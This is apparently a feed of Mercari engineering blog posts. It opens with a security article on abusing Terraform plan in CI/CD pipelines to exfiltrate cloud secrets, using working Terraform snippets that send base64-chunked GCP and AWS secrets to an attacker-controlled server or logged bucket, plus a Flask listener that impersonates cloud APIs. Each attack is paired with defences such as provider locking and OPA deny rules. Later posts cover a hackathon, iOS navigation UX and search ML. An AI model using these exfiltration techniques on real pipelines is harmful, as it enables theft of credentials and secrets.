When using Terraform with a CI/CD system and a version control system like Git the Terraform Plan is usually run on pull requests to verify and review the infrastructure changes caused by the new code. The apply stage is then executed when the code is merged into the main branch. Since both stages require high level access privileges to your infrastructure (plan requires read access and apply requires write access), it is recommended to have appropriate code reviews and approval steps before running Terraform plan or apply CI/CD steps.

Providers

Terraform heavily relies on plugins called providers to provide users the ability to define infrastructure through code for various types of infrastructure (GCP, AWS, etc.). Usually a provider will contain a number of:

resource types: used to configure infrastructure elements
and data source types: used to inspect/read information
Since resources can modify your infrastructure they are only executed during terraform apply. Data sources perform read operations and are executed during terraform plan as well.

An example for a provider that contains main resources and data sources is the Google Cloud Platform Provider, it contains all the resources and data sources necessary to deploy infrastructure using the various GCP services. Providers are most commonly installed from the Terraform Registry. Anyone can publish their own custom provider to this registry.

Terraform Exfiltration

In our previous article we discussed multiple ways an attacker could achieve execution of arbitrary code in your Terraform CI/CD pipeline. We also suggested a few security mechanisms, e.g., provider locking, to mitigate risks and prevent abuse. In this article we will focus on malicious committers and how they can abuse your Terraform CI/CD pipeline to exfiltrate sensitive information.

For discussing the various attack techniques we will use the same Terraform CI/CD environment, described in the next section, for all attacks. We will work our way up from simple attacks to more complex attacks, let’s imagine we are progressing through levels in a game. As we progress through these levels we will add more and more security mechanisms to our Terraform CI/CD environment making it harder to attack and complete the level.

Level 1 – Let me GET your data

In our scenario the malicious attacker can push to our Terraform code repository and can open a pull request, which will trigger the pipeline and run terraform plan. However the attacker needs an approval for merging the pull request, so they cannot trigger the execution of terraform apply. The above figure provides a visual representation of this CI/CD flow.

In our cloud infrastructure we have secrets that can be read by the service account that is running Terraform in the CI/CD pipeline. Our goal is to read those secrets and exfiltrate them to somewhere where we can read them.

Let’s see how we can exfiltrate data with only terraform plan!

As a first step we are going to have to read the secret data. For this level we are trying to exfiltrate a secret from Google Cloud Platform (GCP), so to read data we have to use the Google Secret Manager (GSM) Secret Version data source:

data "google_secret_manager_secret_version" "secret" {
 project = var.project
 secret  = var.secret_id
}

Now that we have the secret data we have to exfiltrate the data somehow. The latest Terraform versions will not print sensitive fields in logs our Terraform plan outputs. So we have to find a way to send the data somewhere without it being sanitized by Terraform. The easiest way to do this is using the HTTP provider’s http data source. This data source can make HTTP GET requests to a given URL. Since it is a data source it is executed during terraform plan, so perfect for exfiltrating the secret. All we need to do is to set the domain of the URL to a server we control and set the path to contain the secret, something like this:

http://${var.exfil_server}/http/${data.google_secret_manager_secret_version.secret.secret_data}

and then we just need to add the http data source like this:

data "http" "example" {
 count = local.chunks
 url   = "http://${var.exfil_server}/http/${data.google_secret_manager_secret_version.secret.secret_data}"
}

However, since the secret might be long and also contain special characters, we need to work a bit more on our exfiltration to be a bit more robust. We slice up the secret in 64 long chunks and base64 encode them. To be able to identify the chunks, the final data we send to our server will look like this:

<Exfil ID>-<Chunk Count>-<Chunk Index>-<base64encode(Chunk)>

Where
Exfil ID: A random unique int used to identify the secret that is being exfiltrated
Chunk Count: Number of chunks the secret has been split into
Chunk Index: The index position of the chunk that is being sent
Chunk: The base64 encoded secret chunk data

So the final terraform code that we add in our pull request will look like this:

data "google_secret_manager_secret_version" "secret" {
 project = var.project
 secret  = var.secret_id
}

locals {
 secret_data = data.google_secret_manager_secret_version.secret.secret_data
// calculate the number of chunks we will split the data into
 chunks      = ceil(length(local.secret_data) / 64)
}

data "http" "example" {
 count = local.chunks
 url   = "http://${var.exfil_server}/http/${var.exfil_id}-${local.chunks}-${count.index}-
         ${base64encode(substr(local.secret_data, count.index * 64, 64))}"
}

You can find the whole code here.

For our listener server we are using a simple Flask server, which waits until it receives all chunks of the secret and then writes it to a file.

import sys

from flask import Flask
from base64 import b64decode
from pathlib import Path

app = Flask(__name__)
store = dict()
secrets_dir = "secrets"

# decode chunks and store in memory
# writes secret data to a file once the last chunk is received
def decode_chunk(method, info):
    (cid, ctotal, cidx, chunk) = info.split("-", 4)

    cid = int(cid)
    ctotal = int(ctotal)
    cidx = int(cidx)
    chunk = b64decode(chunk)

    # add current chunk
    key = f"{method}-{cid}"
    chunk_dict = store.setdefault(key, {})
    chunk_dict[cidx] = chunk
    if len(chunk_dict) >= ctotal:
        # make secrets dir
        path = Path(secrets_dir).joinpath(method)
        path.mkdir(parents=True, exist_ok=True)

        # write secret to file
        fpath = path.joinpath(f"{cid}.txt")
        with open(fpath, "wb") as out:
            for i in range(ctotal):
                out.write(chunk_dict[i])
        del store[key]
        return cid, True

    return cid, False

# http provider
@app.get("/http/<info>")
def http_get(info):
    cid, complete = decode_chunk("http", info)
    if complete:
        print(f"processed secret http exfil: {cid}")
    return "ohhi"

if __name__ == "__main__":
    if len(sys.argv) > 1:
        secrets_dir = sys.argv[1]
    app.run(host="0.0.0.0", port=80)

You can see the exfiltration below:

https://storage.googleapis.com/prd-engineering-asset/2023/07/9f4d61a5-level01_http.mp4

Prevention

As we mentioned in our previous article to prevent malicious providers from being used or too powerful providers from being abused it is recommended to implement provider locking. Meaning only vetted and required providers should be pre-installed into the CI/CD image and Terraform should be used in a configuration that prevents it from automatically installing new providers at runtime. It’s also important to always verify the hashes of the providers as well. You can use this CLI flag to make Terraform use only the pre-installed providers:

terraform init -plugin-dir=/opt/terraform-providers

If you use the http provider in your current pipeline, then it’s recommended to create a custom provider instead.With a custom provider you have more control over what can be executed and can prevent malicious committers from making arbitrary HTTP requests.

Level 2 – Moving back to on-premise

One might think if they implement the security mechanisms described above, they can sit back as their CI/CD pipeline is already protected to perfection. Unfortunately, this is not the case. We only increased the difficulty of this level, it is still possible to beat it. Let’s see how we can circumvent these defenses!

Since we can’t add new providers, we have to work with what we already have. In our case, we have the Google Cloud Platform Provider, since our victim is using GCP as its cloud environment.

Luckily, the GCP Provider has configuration options called custom endpoints. Setting a custom endpoint for a service means that the requests for said service will be sent to the custom endpoint instead of the production GCP endpoint. The intended use for these could be a proxy server or a service emulator, but we can abuse it by pointing it to our listener server.

Alternate addresses can be configured for most of the GCP APIs, but we only need to configure one. Our solution is to set the storage_custom_endpoint (Google Cloud Storage GCS) to our exfiltration server. We choose the GCS API because we really like putting secrets in buckets and definitely not because it is one of the easier APIs to impersonate.

To exfiltrate the secret data we will encode the secret chunk data in storage bucket names. So terraform plan will try to access these buckets via the GCS API, but in reality it will just send GET requests with the encoded secrets to our server.

The terraform code looks like this:

provider "google" {
  alias                   = "exfil"
  project                 = var.project
  region                  = var.region
  storage_custom_endpoint = "http://${var.exfil_server}/"
}

…

data "google_storage_bucket" "exfil" {
  provider = google.exfil
  count    = local.chunks
  name     = "${var.exfil_id}-${local.chunks}-${count.index}-${base64encode(substr(local.secret_data, count.index * 64, 64))}"
}

Full code can be seen here.

In order for the terraform plan to be executed without errors, the listener server needs to respond the same way as the actual GCS API would. So our new endpoint looks like this:

# gcp bucket api impersonator
@app.get("/b/<info>")
def gcp_get(info):
    cid, complete = decode_chunk("gcp-api", info)
    if complete:
        print(f"processed secret gcp bucket exfil: {cid}")
    # the selflink actually doesn't matter
    return f"""
{{
    "kind": "storage#bucket",
    "selfLink": "https://localhost/b/{info}",
    "id": "my-bucket",
    "name": "my-bucket",
    "projectNumber": "0",
    "metageneration": "1",
    "location": "ASIA-NORTHEAST1",
    "storageClass": "STANDARD",
    "etag": "CAE=",
    "defaultEventBasedHold": false,
    "timeCreated": "2022-01-01T00:00:00.001Z",
    "updated": "2022-01-01T00:00:00.001Z",
    "iamConfiguration": {{
        "bucketPolicyOnly": {{
            "enabled": true,
            "lockedTime": "2022-01-01T00:00:00.001Z"
        }},
        "uniformBucketLevelAccess": {{
            "enabled": true,
            "lockedTime": "2022-01-01T00:00:00.001Z"
        }},
        "publicAccessPrevention": "inherited"
    }},
    "locationType": "region",
    "satisfiesPZS": false
}}
"""

You can see it running in the video below:

https://storage.googleapis.com/prd-engineering-asset/2023/07/96749d6b-level02a_gcp.mp4

Bonus Level – A detour into the Amazon rainforest

In the previous level we successfully exfiltrated a secret from GCP by redirecting the GCS API endpoint by using the custom endpoints config of the Google provider, but what if our target CI/CD system is using AWS instead of GCP?

Fortunately, we can basically do the same thing as before. In the AWS provider we can define endpoints, which do the same thing as GCP custom endpoints.

Copying the previous idea, we set the S3 endpoint to the exfiltration server, and we try to access buckets with carefully crafted names with encoded secret data:

provider "aws" {
 region = var.region
 endpoints {
   s3 = "http://${var.exfil_server}/"
 }
}

# get secret from AWS secrets manager
data "aws_secretsmanager_secret_version" "secret" {
 secret_id = var.secret_id
}

locals {
 secret_data = data.aws_secretsmanager_secret_version.secret.secret_string
 chunks      = ceil(length(local.secret_data) / 64)
}

data "aws_s3_bucket" "selected" {
 count  = local.chunks
 bucket = "${var.exfil_id}-${local.chunks}-${count.index}-${base64encode(substr(local.secret_data, count.index * 64, 64))}"
}

Similarly, we add a new endpoint to our server that replies the same way as the real AWS S3 endpoint would:

# aws s3 bucket api impersonator
@app.get("/<info>")
def aws_get(info):
    cid, complete = decode_chunk("aws-api", info)
    if complete:
        print(f"processed secret aws bucket exfil: {cid}")
    return f"""
<?xml version="1.0" encoding="UTF-8"?>
<ListBucketResult xmlns="http://s3.amazonaws.com/doc/2006-03-01/">
    <Name>
        {info}
    </Name>
    <Prefix></Prefix>
    <Marker></Marker>
    <MaxKeys>1000</MaxKeys>
    <IsTruncated>false</IsTruncated>
    <Contents>
        <Key>example.txt</Key>
        <LastModified>2017-06-30T13:36:23.000Z</LastModified>
        <ETag>"7e798b169cb3947a147b61fba5fa0f04"</ETag>
        <Size>2477</Size>
        <StorageClass>STANDARD</StorageClass>
    </Contents>
</ListBucketResult>
    """

You can see it in action below:

https://storage.googleapis.com/prd-engineering-asset/2023/07/bd566a15-level02b_aws.mp4

Prevention

Above we showed that for both GCP and AWS we can use special provider configurations to exfiltrate data by redirecting some of the API endpoints to a server controlled by us. A possible option to prevent this kind of thing would be to do some sort of policy check against the Terraform configuration before running terraform plan. One tool that can be used for this is conftest. With conftest we can create OPA policies and verify and check our Terraform code before execution. Using this we can create a policy that will disallow custom API endpoint configurations for both the Google and the AWS providers:

deny[msg] {
  provider := input.provider.google[_]
  some config
  value := provider[config]

  endswith(config, "_custom_endpoint")

  msg := sprintf(
      "Disallowed custom Google Provider API endpoint configuration found! %s = %s",
      [config, value],
  )
}

deny[msg] {
   provider  := input.provider.aws[_]
   endpoints := provider.endpoints

   count(endpoints) > 0

   some endpoint
   value = endpoints[endpoint]
   msg := sprintf(
       "Disallowed custom AWS API endpoint configuration found! %s = %s",
       [endpoint, value],
   )
}

The above policy iterates through all Google and AWS providers and checks if one of the API endpoint configurations is present, if it finds such a configuration option it will return a policy violation and terraform plan will not be executed.

To make things even more secure we can also add network egress policies to our CI/CD environment that deny any traffic by default. We only egress traffic to systems we know and our CI/CD pipeline needs to communicate with. This would block any data transmission to a custom API endpoint, unless an attacker is able to host their exfiltration server in one of our allowed network ranges.

Level 3 – I should have been logging this all along

Now after remediating Level 2 we have two new protections in place that we need to work around: an OPA policy blocking us from using custom API endpoints, and network egress restrictions only allowing traffic to required systems. Surely these layers of protection will prevent all potential exfiltration attempts, right? Well, not exactly. Even without the custom endpoint we can utilize Google Cloud Storage to exfiltrate data.

The idea is that we try to access objects in a bucket that is in our own GCP project. Since storage bucket IDs are globally unique, we don’t need to provide the project ID in Terraform and also do not have to modify the Terraform provider config, so it is fairly difficult to restrict this type of access. Since we are just using the Terraform provider config as is we can avoid the OPA policy check. Also since we will be talking to the real GCS API operated by Google we will also be able to avoid the network egress traffic filter.

For our new approach to work we slightly have to change where we put our encoded secret data. Previously we encoded the secrets in the storage bucket names, but now to get Terraform to talk to our GCP project we need to set the bucket name to a bucket under our control, so our secret data needs to go somewhere else. Instead of the bucket name we will be encoding the secret in the storage object names. Note that with GCS you have two levels of addressing

Buckets: Can have multiple data objects
Objects: Are part of a storage bucket and represent a single data element

You can think of the bucket name as the hardware drive name and the object name of the file path on that drive.

The objects’ names we are trying to access are the chunks of secrets, and these objects will not exist in our bucket, so it will return an error. This makes this type of exfiltration less smooth than the previous one. The default setting of Terraform is that it does not fail after the first error so we can exfiltrate all the chunks in one go. But even if it is set to fail after one error we can rerun the terraform plan for each chunk, so we can still exfiltrate all the data, but it will be much noisier, thus more easily detectable.

The Terraform code will look like this:

data "google_secret_manager_secret_version" "secret" {
 project = var.project
 secret  = var.secret_id
}

locals {
 secret_data = data.google_secret_manager_secret_version.secret.secret_data
 chunks      = ceil(length(local.secret_data) / 64)
}

data "google_storage_bucket_object" "definitely_a_picture" {
 count  = local.chunks
 name   = "${var.exfil_id}-${local.chunks}-${count.index}-${base64encode(substr(local.secret_data, count.index * 64, 64))}"
 bucket = var.exfil_bucket
}

As we mentioned the objects we access do not exist in our bucket, and we only try to access them, we do not create them, so how do we actually receive the secret data?

The answer is we can just log all interaction with our storage bucket. On GCP Google provides us with a feature called Data Access Audit Logs. If we enable this for all Google Cloud Storage Data Read events we will be able to see all the failed attempts to access objects in our storage bucket.

So after the Terraform Plan is executed we can retrieve the access logs and then decode the secret data based on storage object names in the logs. This can be done with this one liner:

gcloud logging --project <attacker project name> read 'protoPayload.methodName="storage.objects.get" AND resource.labels.bucket_name="<exfil bucket name>"' --limit=100 --format="value(protoPayload.resourceName)" \
  | cut -d'/' -f 6 > dumpaccesslogs.txt \
  && python3 decoder.py dumpaccesslogs.txt secrets

The decoder.py can be found here and uses the same decoding logic we previously used.

The demo of this exfiltration can be seen below:

https://storage.googleapis.com/prd-engineering-asset/2023/07/4015b274-level03_access_logs.mp4

Conclusion

As you can see from these levels, there is no perfect prevention. Probably the most secure method would be to add a review and approval step before running Terraform Plan, but this will slow down development speed and cause a lot of complaints from developer teams just trying to get their work done.

In reality, we can only recommend good old security practices, i.e., defense in depth. In addition to the prevention mechanisms already introduced above make sure that your Terraform CI/CD platform only has the minimum access privileges that are required. Meaning while you will probably use Terraform to create secrets in Google Secret Manager (or the equivalent of your infrastructure) you will most likely not use it and should not use it to either write or read secret data (i.e., Secret Versions). The CI/CD system only needs privileges to create those GSM secrets, but not the privileges needed to read or write data. By following this principle of least privilege for all infrastructure resources you can prevent some degree of exposure in the event of a compromise.

Other than that it’s also important to make sure that your developers are educated about the dangers of a malicious Terraform Plan or Apply. This might help them identify malicious code as part of a code review process.

Finally, we leave the development of further harder levels or also even cool bonus levels requiring to bypass the above restrictions in different ways to the community. Let us know what you come up with!

Mercari Hack Fest #7 : Introducing the Winners!

Fri, 30 Jun 2023 11:47:48 GMT

Hello, my name is @afroscript from the Engineering Office.

Mercari Hack Fest (“Hack Fest”), a technology festival for engineers was held for three days from April 19th-21st.

This article explains how the “Showcase Day”, the concluding event of Hack Fest was like, as well as the introduction of project award winners.

“Showcase Day” was held in a Hybrid Style

On the final day of Hack Fest, we held “Showcase Day”, an event where engineers could present the result of their effort over the past three days.

Since Mercari has the “YOUR CHOICE” system, which allows our members to work anywhere within Japan, the “Showcase Day” was held in a hybrid style, providing our members with the options to participate in both online and offline.

Approximately 300 engineers, project managers and other members from various departments participated in Showcase Day. A total of 24 out of 75 ideas generated during Hack Fest period were presented.

Award Winners

Among the projects presented, those that particularly wowed the judges were selected for Hack Fest Award.

First, let me introduce the winners of GOLD / SILVER / BRONZE Award and their projects.

GOLD Hack Fest Award “Mercari Items Discovery”

Team members

@chan.jonathan, @Misha.k, @Anandh, @tsubo, @cowana, @anastasia, @alisa

Project outline

Developed a function that makes it easier for customers to find newly exhibited items by allowing them to view newly arrived products in story format.

SIVER Hack Fest Award “Project-MI”

Team members

@kiran-k-a, @manoj, @dinesh, @vaibhav, @prajwal, @prasanna

Project outline

Developed a function to easily switch the app language between English and Japanese.

BRONZE Hack Fest Award: “Age Group Facet Filter for Fashion Categories” & “Search + ChatGPT”

This time, 2 projects were selected for the BRONZE Award.

Age Group Facet Filter for Fashion Categories

Member: @akkie
Project Outline : Created a filter to narrow down the search result by age group when browsing in the fashion category and developed a function that can display only popular products in the selected age group.

Search + ChatGPT

Member: @allan.conda
Project Outline: Developed a function that provides suggestions for pages users may want to visit when typing words in the search bar by utilizing ChatGPT and created a chat-based feature that enables users to obtain answers by interacting with data such as Mercari ID and purchase history.

Extra Awards

In addition to the Hack Fest Awards, the "FinOps Award" was presented to individuals or teams who actively foster a culture of cost awareness and ownership of spending. “LLM Award” was given as another special award for the project utilizing the Large Language Model (LLM) technology within the group.

Fin Ops Award: “Shell-Shockingly Good Kubernetes Autoscaling” / Member: @sanposhiho
LLM Award: “Mercari Comment Assistant By Chat GPT” / Member: @kenmaz

Furthermore, “Judge Special Mention” was given to the following three projects which were not selected for the Hack Fest Award, but left a special impression on the judges.

PJ Name: “Buyer Next” / Members: @erika.takahara, @wills
PJ Name: “Improve UI for QAC” / Members: @mohit, @Chin-ming, @romy
PJ Name: “Feedback Classification”/ Members: @a-corneu, @meatboy, @aggy, @kazzy

After Party

Once the presentations are done, it’s time for the After Party! Hack Fest is a "festival" of technology, so this time I tried to create a Japanese-style festival atmosphere by adding festive decorations and shooting games and ring toss games.

The original “Hack Fest Tea” (roasted green tea) was presented to those who scored well in shooting and ring toss games.

Summary

This year’s event was once again a great success, with numerous excellent projects developed within such a short timeframe.

Also, the number of members participating online has increased significantly since last time, and it was impressive that they were having a lot of fun communicating during breaks and after parties, and enjoying Japanese-style festival decorations and games.

The next event will be held in autumn. We will continue to update the content and brush it up as a more interesting technology festival, so please look forward to it!

Designing iOS Screen Navigation for Best UX

Wed, 28 Jun 2023 10:00:10 GMT

This article from day 17 of Merpay Tech Openness Month 2023 is brought to you by @kris from the Merpay iOS team.

The Power of UX in iOS App Development

An app’s user experience, or UX for short, simply refers to the experience a user has while interacting with an app. This is usually handled by an experienced designer or design team, but is tightly coupled with development and should also be considered by iOS developers as they work on an app.

When you download an iOS app for the first time you may be excited to try it out and to learn about all the useful features it has to offer. You might be looking for all the ways the app stands out and is different from others, or how it can solve a problem better than the competition. Maybe you really like the unique design of the app or simply just because of how smoothly it performs. There may be major differences between the new app you just downloaded and others you have used in the past, but for some reason you already know how to use it. You know that if you see a back button you can swipe back to navigate to a previous screen, or that you can delete an item in a list by swiping it from the right. You know how to perform these actions because they are all common features found in iOS apps, and you have come to rely on them in every app you download. In fact, we tend to rely on these features so much that when we attempt to do something and the result is not as we expected, it can often feel very unsettling and break our concentration from the app and its content. This is obviously not what we want to happen to our users, and that is why design standards exist: to help make the experience as positive and natural as possible.

Apple’s UX Guidelines

Reference：https://developer.apple.com/design/human-interface-guidelines/designing-for-ios

There is a general consensus that Apple has high standards and strict rules for app developers wanting to release an app in the App Store. This not only has to do with privacy, security, and safety standards, but with app design and user experience as well. Apple frequently releases documentation and videos related to managing your app’s user experience to make things more consistent and familiar between all apps, and maintains extensive Human Interface Guidelines for the entire Apple ecosystem. One video in particular about navigation design, titled “Explore navigation design for iOS”, is the inspiration for some changes we made recently to the Mercari iOS app.

In the video, which is helpful for both new and experienced developers alike, some very important app navigation best practices are discussed. Navigation in an app can have one of the biggest impacts on a user’s experience, being nearly unnoticed when things behave as expected but a big problem when they don’t. It’s best to consider how a certain flow in the app will effect a user, both positively or negatively, when designing navigation between screens.

For example, in the video it states that changing tabs in a tab bar can become a source of confusion when the user loses track of where they are in an app after performing some action. Let’s say the user is on the app’s home screen and taps a button to view a list of notifications. It could be considered bad UX to take the user to a settings tab first, for instance, instead of displaying the notifications directly from where they are. This concept is especially true when the change of tabs breaks an established flow within the app, such as a purchase flow, since it could lead to the loss of sales and an overall negative experience for the user.

Another important topic covered in the video is about when to display content in a modal style, meaning the new screen is pushed in from the bottom of the current screen and displayed on top. The alternative on iOS is normally to simply push a new screen into the navigation stack, displaying the familiar back button and allowing the user to swipe back to the previous screen. When content is displayed modally, it can reduce distractions and let the user focus on the task at hand and to let them know that it is a separate flow from where they just were. Apple recommends this method to be used when the task is self-contained, can be started and finished from within the modally presented screen, and doesn’t rely on other parts of the app to finish. This kind of task is usually optional with a close button at the top, and lets the user know that they should finish, or dismiss, the presented flow in order to continue using the app.

Real-World Implementation in the Mercari App

At Mercari we are constantly looking for ways to improve our app and service for our users, and this is especially true for Merpay as a financial services provider. A bad experience in any app can lead to frustration and discontent, but when money is involved it becomes even more crucial to provide the highest level of quality possible to secure the trust and loyalty of users.

Our credit card, known as Mercard, is a modern credit card which is fully integrated into our iOS app. Users can apply for, activate, and check the spending of their card all from within the app. In the checkout screen when a user is purchasing an item we had an option to apply for the Mercard. Upon applying, the user was taken to the Merpay payment tab where they were presented with the application screen. This change of tabs was implemented in this way on purpose since the application flow was originally developed to only be pushed from the navigation stack located at the Merpay payment tab, and all QA testing was done under that assumption as well. At the original time of development, there were no plans to display the screen from other locations in the app directly. Since it was not verified that the flow would work properly when displayed from multiple locations, and since it would be hard to verify that pushing to various navigation stacks throughout the app wouldn’t present any additional issues, the presentation was locked to the payment tab. This caused problems for our users, taking them away from their transaction and forcing them to move to a new location in the app was not ideal. Once they finished their Mercard application they were no longer on the checkout screen and needed to find their way back on their own.

Around the same time there was a renewed interest within the Merpay iOS team to analyze various flows throughout the app to try to improve the UX and to make them more flexible in terms of where they could be presented from. I saw this situation as an opportunity to do two things at once: to change the Mercard application flow into a more flexible, self-contained task that can be safely presented from anywhere in the app, and to improve the checkout experience by keeping the users in the checkout flow rather than moving them to the Merpay payment tab. Thus, the refactor of the Mercard application flow was born!

In order to improve the flow we focused on a few key points:

Remove any points of friction for the user
Refrain from forcing the user to change tabs and keep them in the same place they started
Remove distractions by covering the current screen contents
Make it obvious that the application process is an optional, self-contained task

Before (Push)	After (Modal)

The change itself went surprisingly well with few issues as we modified the navigation style to be modal. You might imagine that any screens that are reused from other parts of the app and are pushed to the flow could experience problems with a modified navigation style, but we were pleasantly surprised to see that most screens had no issue with the changes and we could proceed rather quickly with minimal adjustments.

Of course, there are risks in iOS when presenting a screen modally, such as when attempting to present from an already presenting view controller. Additionally, presenting a screen modally means that you do not have information about the location of the app where the screen will be presented from, which you would have when presenting from a predefined location each time. The changes were thoroughly tested by our QA team, and after some time the flow was approved and ready for use in the app.

It’s also important to note that not every flow in an app should be presented in a modal style, and that careful consideration should be made when deciding which style to use. By following Apple’s guidance, we were able to decide on changing the application flow to modal style, and continue to look for other flows in the app to refactor in the future as well.

Conclusion

No matter your role, whether you’re a developer, project manager, or designer, it is important to always consider the user’s experience when interacting with your app and how to ensure it remains positive and keeps bringing them back for more. Apple provides great resources for apps of any size to help improve their UX, and in turn it helps to keep iOS apps feeling consistent and easy to use. Refactoring the Mercard application flow increased the checkout completion rate by a statistically significant amount, and helped keep user satisfaction high by changing the app to fit their expectations and reduce friction. We will continue to search for quality of life improvements such as this in order to deliver the best possible experience to everyone using Mercari on iOS.

Tomorrow’s article will be by @champon. Please check it out!

Mercari’s Journey Integrating AI & Search at Berlin Buzzwords 2023

Mon, 26 Jun 2023 12:00:03 GMT

This year Mercari attended Berlin Buzzwords 2023 where Ryan Ginstrom and Teo Narboneta Zosa of the Search team shared how we successfully established our search ML infrastructure in their talk, Building MLOps Infrastructure at Japan’s Largest C2C E-Commerce Site (Slides).

Berlin Buzzwords is the world’s preeminent search conference focused on modern data infrastructure, search, and machine learning powering other major tech companies across the globe. The Plain Schwarz conference organizers put on a fantastic 2023 edition (special thanks to Sven, Paul, and the rest of the team for one of the most pleasant conference experiences to date!) and we were honored for the opportunity to share with the rest of the industry the practical and battle-tested insights gleaned from our journey.

This blog post summarizes the talk while providing a comprehensive overview of the connections and intersections between Mercari’s ongoing journey integrating AI and the other exciting discussions at Berlin Buzzwords 2023. At the end of the article, we’ll review our key takeaways and briefly peek at where we’re heading next.

The talk itself consists of the following sections:

Problem: Integrating Machine Learning (ML) Into a Traditional Term-based Search Architecture
MLOps: Why & How
ML Model Serving
ML Model Monitoring

Integrating ML Into a Traditional Term-based Search Architecture

Mercari started in 2013 with a ‘traditional’ term-based search system, which was effective for nearly a decade. However, with recent advancements in AI, we knew we could deliver a significantly better search experience to our users by making AI a primary focus area. Before the introduction of AI in 2022, our search system, based on Elasticsearch, initially leveraged mostly basic tuning, synonym matching, and rules-based filtering of search results.

There were many fantastic talks at Buzzwords 2023 covering the major search engines, from the classic contenders Elasticsearch and Solr to more recent challengers to the space like Vespa.

For the Elasticsearch folks, Uwe Schindler and Charlie Hull gave a talk, "What’s coming next with Apache Lucene?" where they outlined exciting features, such as native support for vector search and various performance improvements.

On the Solr side of the search engine world, Jason Gerlowski’s talk, "A Fresh Start? The Path Toward Apache Solr’s v2 API" detailed Solr’s path forward modernizing its HTTP APIs and associated clients.

Buzzwords 2023 also hosted a panel discussion of search engine and vector search experts to discuss and contrast search technologies with speakers from ElasticSearch, Vespa, Apache Solr, Weaviate, and Qdrant in "Berlin Buzzwords 2023: The Debate Returns (with more vectors): Which Search Engine?"

If you are interested in reading more about the use of Kubernetes and Elasticsearch at Mercari, @mrkm4ntr wrote a detailed article about the Search Infrastructure team’s journey optimizing resource consumption of our Elasticsearch Kubernetes deployments:

Jul.13,2023

Implementing Elasticsearch CPU usage based auto scaling

While simple and reliable, the system was not designed in a way that could easily incorporate ML methods. Mercari also handles a massive amount of search traffic serving our over 20 million monthly active users, making extreme, sweeping change difficult. For instance, we didn’t have the option of completely replacing our underlying search engine with one that easily supports AI-enhanced search (e.g., Vespa). The most significant challenge to our ambition of upgrading our search system was doing so iteratively to ensure the user search experience was always strictly better at each stage.

For a great example of how Vespa shines inside & outside of search, take a look at the blog post, "Adopting the Vespa search engine for serving personalized second-hand fashion recommendations at Vinted" from our good friends at Vinted, Aleksas Keteiva and Dainius Jocas.

To address these technical and business constraints, we saw an opportunity to start with "learning to rank" (LTR) as the first entry point for integrating AI in our search system, leveraging AI to re-rank the search results retrieved by Elasticsearch. This approach could easily integrate with the existing system and was thus the first step toward our incremental path forward.

Alexander Zagniotov and Richard Calland of the Search team previously wrote in-depth on our journey developing Mercari’s pioneering LTR models, including the challenges faced by Mercari and the industry in general.

Jan.1,2023

The Journey to Machine-Learned Re-ranking

MLOps: Why & How

MLOps is the application of DevOps principles to ML deployment, involving the tasks required to deploy ML models into production consistently. There is no one-size-fits-all solution, but common patterns and themes have emerged that can help guide ML application development.

Our guiding principle was focusing on the feature first and the software second. We chose the technologies and approaches that best served those features, not the other way around. We constantly collaborated with other teams, gathering feedback and ensuring we aligned with the broader organizational vision. Hardening a system for production is non-trivial and requires significant expertise and resources. By staying simple and small with our feature improvements at each stage, we were able to satisfy both the technical and business constraints at each juncture, quickly building and continuously extending a resilient, production-ready ML system at scale based on real-world needs to ensure we always delivered the most significant business impact aligned with Mercari’s strategic direction.

For more on the organizational & technical challenges major e-commerce companies face when building scalable search systems and the strategies they use to successfully overcome those challenges, see Khosrow Ebrahimpour of Shopify’s talk, "Highly Available Search at Shopify" as well as Matt Williams of Cookpad’s talk, "Cooking up a new search system: Recipe search at Cookpad."

ML Model Serving

Serving a model is often the trickiest part of production ML systems. We undertook significant development efforts across our search system to create opportunities to incorporate machine learning models.

The initial implementation packaged the model directly within the backend search server. This approach was the simplest possible solution and enabled a quick initial release. However, this approach needed to be more scalable and afford the ability to iterate on new features and model variants frequently. To address this, we decoupled the model from the search server, moving it to a separate prediction service, which enabled faster iteration and the flexibility to choose the most effective tools and frameworks for the job. The final breakthrough solution was leaning on Seldon with Istio, respectively, for model serving and traffic routing, significantly improving development speed and simplifying deployment, ultimately enabling us to overcome our remaining challenges.

While model serving frameworks can make model serving more scalable and performant, a crucial but often overlooked aspect of both model serving and training is the supporting data pipelines and infrastructure that produce the data needed for the models; without data, the models are useless.

We jump straight to model serving in this article for brevity, but if you’re interested in learning more about our data pipelines at a high-level, please see the data pipelines section of our talk (beginning at 14:51).

A significant amount of our data infrastructure relies on Apache Airflow, a popular industry-grade data orchestration and management platform. If you’re interested in a practical deep dive, Bhavani Ravi’s talk, "Apache Airflow in Production – Bad vs Best Practices" contains a lot of great advice for leveraging Apache Airflow reliably at scale.

ML Model Monitoring

Finally, model performance monitoring is a critical but underemphasized component of production ML systems. These metrics bolster operational resilience while addressing the limitations of relying solely on "online" business metrics, which are trailing indicators and, in the worst case, aren’t sensitive enough to surface issues at all. We highlight the need for leading indicators to catch performance issues ahead of time to prevent a negative impact on the business’s bottom line. We use Alibi detect, a feature provided by Seldon that monitors model inputs and outputs over time, detecting aberrations such as significant changes in user behavior (implying the model should be retrained to maximize performance) or even more pernicious issues like breaking changes in upstream data sources.

For more on "online" search quality metrics and how they can be used to generate practical insights, Anna Ruggero and Ilaria Petreti gave a talk, "How to Implement Online Search Quality Evaluation with Kibana." They presented how they use Kibana to create visualizations and dashboards to compare different rankers during A/B testing to better gauge models’ projected impact on business KPIs.

Key Takeaway

Our journey highlights the importance of gradually integrating AI into search systems and addressing concrete use cases when operating at scale. While there were significant technical challenges along the way, the primary catalyst for success was choosing the right trade-offs at each stage and prioritizing collaboration across the company to ensure that the AI system aligns with the business goals. To do this, you must balance starting simple while avoiding technical debt and brittle architecture to help pave the way for each successive step forward. Start simple, seek constant feedback, and build the system piece by piece in response to real problems to demonstrate business impact, which ensures you ultimately deliver the right product.

What’s Next?

This has been our journey integrating AI into our search system so far, and we’re just getting started. Moving forward, we are on our way to bringing more advanced AI technologies to our search system, including LLMs, vector search, and hybrid search.

There were many great talks covering LLMs, vector search, and hybrid search at this year’s Buzzwords conference.

For an example demonstrating the use of LLMs to great effect in search, see Jo Kristian Bergum’s talk, "Boosting Ranking Performance with Minimal Supervision" which outlined how LLMs could be leveraged for synthetic labeled data generation to train in-domain ranking models with minimal human feedback.

Vector Search has been gaining significant attention and has quickly become one of the most promising technologies in information retrieval. For an excellent overview of how vector search can be integrated with a classic search engine, see Atita Arora’s talk, "Vectorize Your Open Source Search Engine" where Atita demonstrated the usage of bi-encoders to project queries and documents into a latent embedding vector space for nearest neighbor-based similarity search.

